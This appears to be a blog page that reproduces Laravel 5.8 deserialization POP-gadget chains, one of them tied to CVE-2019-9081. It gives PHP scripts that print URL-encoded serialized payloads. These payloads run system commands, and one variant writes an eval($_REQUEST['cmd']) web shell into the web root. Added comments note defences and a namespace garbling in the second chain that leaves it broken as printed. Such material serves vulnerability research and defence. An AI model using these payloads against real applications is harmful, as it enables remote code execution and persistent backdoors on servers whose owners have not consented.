pop1
Illuminate\Broadcasting\PendingBroadcast->__destruct()
Faker\Generator->__call()
Faker\Generator->format()
Faker\Generator->getFormatter()
<?php
namespace Illuminate\Broadcasting{
// Bare stand-in that exists only so serialize() writes this class name into
// the output; it defines no behaviour. The chain listed on this page starts
// at the real class's __destruct().
class PendingBroadcast
{
// Declared here but never assigned by the constructor below.
private $dispatch;
// $events: object stored in `events`; $event: value stored in `event`.
public function __construct($events, $event)
{
// `event` and `events` are not declared on this stub, so both are created
// as dynamic (public) properties; PHP 8.2+ reports that as deprecated.
$this->event = $event;
$this->events = $events;
}
}
}
namespace Faker{
// Stand-in for Faker\Generator that models only the `formatters` property.
// The page's chain runs __call() -> format() -> getFormatter(); this map is
// presumably what getFormatter() looks names up in — confirm against the
// installed Faker source.
class Generator
{
protected $formatters = array();
// $formatters: array stored as-is (the driver passes name => callable pairs).
public function __construct($formatters)
{
$this->formatters = $formatters;
}
}
}
namespace {
// Assembles the object graph and prints it serialized and URL-encoded.
// The string matters only where an application feeds request data to
// unserialize(); the defence sits at that call: exchange data as JSON, or
// pass ['allowed_classes' => false] so no project class is instantiated.
// Formatter map: the name 'dispatch' is bound to PHP's system().
$b = new Faker\Generator(['dispatch'=>'system']);
// The Generator goes in the `events` slot, the string 'dir' in `event`.
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 'dir');
echo urlencode(serialize($a));
}
写shell
PhpOption\LazyOption->option()
<?php
namespace Illuminate\Broadcasting{
// Stand-in carrying the framework class name for serialize(); it has no
// methods beyond the constructor and declares no properties.
class PendingBroadcast
{
// $events: object stored in `events`; $event: value stored in `event`.
public function __construct($events, $event)
{
// Both properties are created dynamically (public), since the stub
// declares none; PHP 8.2+ flags dynamic properties as deprecated.
$this->event = $event;
$this->events = $events;
}
}
}
namespace Faker{
// Stand-in for Faker\Generator; only the protected `formatters` array is
// reproduced, because that is the only state this listing sets.
class Generator
{
protected $formatters = array();
// $formatters: array stored unchanged; the driver supplies one entry whose
// value is an array callable.
public function __construct($formatters)
{
$this->formatters = $formatters;
}
}
}
namespace PhpOption {
// Stand-in for PhpOption\LazyOption: stores a callable and its argument list
// and nothing else. The page names LazyOption->option() as the step this
// variant relies on; where exactly the stored callable is invoked is not
// shown here — confirm against the phpoption source.
final class LazyOption
{
private $callback;
private $arguments;
// $callback: callable (name or array form); $arguments: positional
// arguments kept alongside it.
public function __construct($callback, array $arguments = [])
{
$this->callback = $callback;
$this->arguments = $arguments;
}
}
}
namespace {
// Stored callable is file_put_contents() with a hard-coded destination under
// the web-served `public` directory of the author's XAMPP install and a
// one-line PHP body. For defenders the artefact to alert on is a new .php
// file appearing in the web root, written by the web-server account.
$c = new PhpOption\LazyOption('file_put_contents', ['D:\xampp\htdocs\Laravel58\public\shell.php', '<?php eval($_REQUEST[\'cmd\']); ?>']);
// Formatter 'dispatch' is the array callable [LazyOption instance, 'filter'].
$b = new Faker\Generator(['dispatch'=>[$c, 'filter']]);
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 1);
// Prints the URL-encoded serialized graph; it is inert unless an application
// passes it to unserialize().
echo urlencode(serialize($a));
}
pop2
Illuminate\Broadcasting\PendingBroadcast->__destruct()
Illuminate\Bus\Dispatcher->dispatch()
Illuminate\Bus\Dispatcher->commandShouldBeQueued()
Illuminate\Bus\Dispatcher->dispatchToQueue()
<?php
namespace IlluminateBus{
// NOTE(review): the namespace is printed as `IlluminateBus`, with no
// separator, unlike the `Illuminate\...` form used on the chain line for
// PendingBroadcast; the backslash was probably lost when the page was
// rendered — verify against the original post.
// Stub with a single protected property, `queueResolver`.
class Dispatcher{
protected $queueResolver;
// $queueResolver: stored unchanged (the driver passes an array callable).
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace IlluminateEvents{
// Stub holding only `connection`. The driver uses an instance of it as the
// `event` value of PendingBroadcast. The namespace is printed without a
// separator (`IlluminateEvents`) — presumably a rendering loss, verify.
class CallQueuedListener{
protected $connection;
// $connection: value stored in `connection` (the driver passes a string).
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace IlluminateBroadcasting{
// Stub with the two protected properties `events` and `event`. Visibility
// and declaration order are part of the serialized form, so they are
// documented rather than rearranged. The namespace is printed without a
// separator, unlike the chain line that names this class — verify.
class PendingBroadcast{
protected $events;
protected $event;
// $events: object stored in `events`; $event: value stored in `event`.
public function __construct($events, $event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace PhpOption{
// Stand-in for PhpOption\LazyOption with three private properties. This
// variant also models `option`, which the driver sets to null; what the
// library does with a null `option` is not shown on this page — confirm
// against the phpoption source.
final class LazyOption{
private $callback;
private $arguments;
private $option;
// $callback: callable; $arguments: its argument list; $option: stored as
// given, with no default.
public function __construct($callback, $arguments, $option)
{
$this->callback = $callback;
$this->arguments = $arguments;
$this->option = $option;
}
}
}
namespace{
// NOTE(review): every class named below is written without namespace
// separators (`PhpOptionLazyOption`, `IlluminateBusDispatcher`, ...), so as
// printed these are global names that no block in this listing declares.
// Stored callable: system() with the single argument 'id', `option` null.
$c = new PhpOptionLazyOption('system', array('id'), null);
// Listener stub with `connection` set to 'id'.
$d = new IlluminateEventsCallQueuedListener('id');
// queueResolver is the array callable [LazyOption instance, 'filter'].
$b = new IlluminateBusDispatcher(array($c, 'filter'));
// Dispatcher goes in `events`, the listener stub in `event`.
$a = new IlluminateBroadcastingPendingBroadcast($b, $d);
echo urlencode(serialize($a));
}
pop3
Illuminate\Broadcasting\PendingBroadcast->__destruct()
Illuminate\Validation\Validator->__call()
Illuminate\Validation\Validator->callExtension()
<?php
namespace Illuminate\Broadcasting{
// Stand-in that declares `events` and `event` as protected and has no
// methods beyond the constructor. The chain on this page begins at the real
// class's __destruct().
class PendingBroadcast{
protected $events;
protected $event;
// $events: object stored in `events`; $event: value stored in `event`.
public function __construct($events, $event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace Illuminate\Validation{
// Stand-in for the validator that models only the public `extensions` array.
// The chain on this page ends at Validator->callExtension(), so this array
// is presumably the table that method looks up — confirm against the
// framework source.
class Validator{
public $extensions = [];
// $extension: array assigned to `extensions` (note the singular parameter
// name versus the plural property).
public function __construct($extension)
{
$this->extensions = $extension;
}
}
}
namespace{
// Extension table with one entry: the empty-string key mapped to 'system'.
// Why the key is empty is not explained on the page; presumably it is what
// the called method name reduces to inside the validator — TODO confirm.
$b = new Illuminate\Validation\Validator(array(''=>'system'));
// Validator goes in `events`, the string 'dir' in `event`.
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 'dir');
// Request logs are the place to look for this: a parameter whose decoded
// value starts with `O:` followed by a quoted framework class name.
echo urlencode(serialize($a));
}
pop4
Laravel v5.8 反序列化rce (CVE-2019-9081) 复现
<?php
namespace Illuminate\Foundation\Testing{
// Stand-in for the PendingCommand class; the page's heading associates this
// listing with CVE-2019-9081. Only the three properties are modelled, with
// the visibility the author declared (one public, two protected), since
// visibility is encoded in the serialized form.
class PendingCommand{
public $test;
protected $command;
protected $parameters;
// $command: stored in `command`; $parameters: stored in `parameters`;
// $test: object stored in the public `test` property.
public function __construct($command, $parameters, $test)
{
$this->command = $command;
$this->parameters = $parameters;
$this->test = $test;
}
}
}
namespace Faker{
// Stand-in for Faker\DefaultGenerator holding a single `default` value.
// How the real class uses `default` is not shown on this page; presumably it
// is returned for any property or method access — confirm against the
// Faker source.
class DefaultGenerator{
protected $default;
// $default: value stored as-is; null when omitted.
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace{
// DefaultGenerator wrapping the array ['0' => '1']; the page does not say
// why this particular array is used.
$b = new Faker\DefaultGenerator(['0'=>'1']);
// `command` is 'system', `parameters` is ['dir'], `test` is the generator.
$a = new Illuminate\Foundation\Testing\PendingCommand('system', ['dir'], $b);
// The printed string has an effect only at an unserialize() call on
// request data; calling it with ['allowed_classes' => false], or not
// unserializing request data at all, removes the entry point for every
// chain in this listing.
echo urlencode(serialize($a));
}